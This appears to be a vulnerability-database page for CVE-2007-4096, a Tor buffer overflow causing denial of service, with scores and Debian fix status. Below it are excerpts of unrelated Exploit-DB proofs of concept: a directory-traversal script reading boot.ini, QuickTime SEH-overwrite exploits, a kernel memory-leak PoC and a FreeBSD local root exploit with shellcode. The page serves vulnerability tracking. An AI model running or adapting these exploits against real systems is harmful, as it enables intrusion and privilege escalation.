CVE-2007-4096
published 2007-07-30CVE-2007-4096: Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remote attackers to cause a denial of service via unspecified vectors.
PriorityP422medium5.8CVSS 2.0
AVNACMAuNCPINAP
EPSS
2.01%
78.6th percentile
Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remote attackers to cause a denial of service via unspecified vectors.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | tor | < tor 0.1.2.15-1 (bookworm) | tor 0.1.2.15-1 (bookworm) |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| tor | tor | — | — |
| torproject | tor | >= 0 < 0.1.2.15-1 | 0.1.2.15-1 |
| torproject | tor | >= 0 < 0.1.2.15-1 | 0.1.2.15-1 |
| torproject | tor | >= 0 < 0.1.2.15-1 | 0.1.2.15-1 |
| torproject | tor | >= 0 < 0.1.2.15-1 | 0.1.2.15-1 |
CVSS provenance
nvdv2.05.8MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:P
osv5.8MEDIUM
vendor_debian5.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rmmw-wrwp-3vrq: Buffer overflow in Tor before 0
ghsa_unreviewed·2022-05-01
CVE-2007-4096 [MEDIUM] GHSA-rmmw-wrwp-3vrq: Buffer overflow in Tor before 0
Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remote attackers to cause a denial of service via unspecified vectors.
OSV
CVE-2007-4096: Buffer overflow in Tor before 0
osv·2007-07-30·CVSS 5.8
CVE-2007-4096 [MEDIUM] CVE-2007-4096: Buffer overflow in Tor before 0
Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remote attackers to cause a denial of service via unspecified vectors.
Debian
CVE-2007-4096: tor - Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remo...
vendor_debian·2007·CVSS 5.8
CVE-2007-4096 [MEDIUM] CVE-2007-4096: tor - Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remo...
Buffer overflow in Tor before 0.1.2.15, when using BSD natd support, allows remote attackers to cause a denial of service via unspecified vectors.
Scope: local
bookworm: resolved (fixed in 0.1.2.15-1)
bullseye: resolved (fixed in 0.1.2.15-1)
forky: resolved (fixed in 0.1.2.15-1)
sid: resolved (fixed in 0.1.2.15-1)
trixie: resolved (fixed in 0.1.2.15-1)
No detection rules found.
Exploit-DB
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
exploitdb·2010-01-06
CVE-2007-6166 Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
---
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) )
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $ju
Exploit-DB
Radio istek scripti 2.5 - Remote Configuration Disclosure
exploitdb·2009-11-25
CVE-2009-4096 Radio istek scripti 2.5 - Remote Configuration Disclosure
Radio istek scripti 2.5 - Remote Configuration Disclosure
---
turkish radio php script
RADIO istek scripti (tr) Version 2.5 (tr) Remote config Vulnerability
> Found by? :? kurdish hackers team
> C0ntact : pshela [at] YaHoo .com
> Groups : Kurd-Team
> site : www.kurdteam.org
+++++++++++++++++++ Script information+++++++++++++++++
> script :: RADIO istek scripti (tr) Version 2.5 (tr)
> download script ::
http://www.scriptlerim.net/download/radio-istek-scripti-tr-.html
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
> Dork:"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5"
> 0r
> Dork:"estafresgaftesantusyan.inc"
> Exploit ::
>>> http://server/path/estafresgaftesantusyan.inc
Now can see all information Config ...
> All freinds , Zryan_kurd , all member kurdi
Exploit-DB
MiniWebsvr 0.0.9a - Remote Directory Traversal
exploitdb·2008-03-03
CVE-2007-0919 MiniWebsvr 0.0.9a - Remote Directory Traversal
MiniWebsvr 0.0.9a - Remote Directory Traversal
---
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
# milw0rm.com [2008-03-03]
Exploit-DB
Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)
exploitdb·2007-11-23
CVE-2007-6166 Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)
Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)
---
#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish
# Details:..
#
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
#
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [42424242])
# ----------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C9037D8: 8B
Exploit-DB
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak
exploitdb·2007-07-10·CVSS 7.2
CVE-2007-1000 [HIGH] Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak
Linux Kernel
#include
#include
#include
#include
#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR 0xd0000000
unsigned int i;
int main(int argc, char *argv[]) {
int s;
unsigned int optlen;
void *ptr;
char value[10240];
char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) {
perror("mmap");
exit(-1);
}
memset(ptr,0,4096);
/* Make ptr point to np->
Exploit-DB
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
exploitdb·2007-03-26
CVE-2007-1719 FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
---
// ejecsploit.c - local root exploit for bsd's eject.c
// harry
// vuln found by kokanin (you 31337!!! ;))
// thanks to sacrine and all the other netric guys!!! you rule :)
#include
#include
#include
#include
#define LEN 1264
#define NOP 0x90
extern char** environ;
int main(){
char buf[LEN];
char* ptr;
char* arg[4];
unsigned int ret, i;
char shellcode[]="\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd"
"\x80\xe8\xe4\xff\xff\xff/bin/sh";
// hardcoded... too boneidle to fix this
ret = 0xbfbfee16;
char envshell[4096];
ptr = envshell;
for (i = 0; i > 8);
buf[LEN-3] = (char) ((0x00ff0000 & ret) >> 16);
buf[LEN-2] = (char) ((0xff000000 & ret) >> 24);
bu
http://archives.seul.org/or/announce/Jul-2007/msg00000.htmlhttp://osvdb.org/46968http://secunia.com/advisories/26140http://www.securityfocus.com/bid/25035http://www.vupen.com/english/advisories/2007/2634http://archives.seul.org/or/announce/Jul-2007/msg00000.htmlhttp://osvdb.org/46968http://secunia.com/advisories/26140http://www.securityfocus.com/bid/25035http://www.vupen.com/english/advisories/2007/2634
2007-07-30
Published